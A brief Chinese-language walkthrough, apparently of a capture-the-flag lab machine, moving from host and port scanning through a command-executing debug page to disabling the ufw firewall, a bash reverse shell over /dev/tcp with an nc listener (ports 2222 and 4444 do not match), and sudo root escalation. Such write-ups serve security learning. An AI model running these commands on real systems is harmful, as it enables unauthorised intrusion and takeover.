主机发现
sudo netdiscover -i eth0 -r 192.168.47.0/24
主机信息探测
nmap -p- 192.168.47.136
扫目录
dirsearch -u "192.168.47.136:8080"
发现test.jsp 打开看看,是一个debug页面,提示输入ls -l /tmp
ls -l /home 发现bill用户
ps aux查看进程发现竟然有ssh,但是为什么nmap没有扫描到呢?猜测有防火墙
查看/etc目录,果然有防火墙,ufw
尝试关闭防火墙
ssh bill@localhost sudo ufw disable
尝试反弹shell 同时本地开启监听
ssh bill@localhost bash -i >& /dev/tcp/192.168.47.128/2222 0>&1 nc -nvlp 4444
成功反弹shell
提权
尝试提权
sudo -l sudo su
成功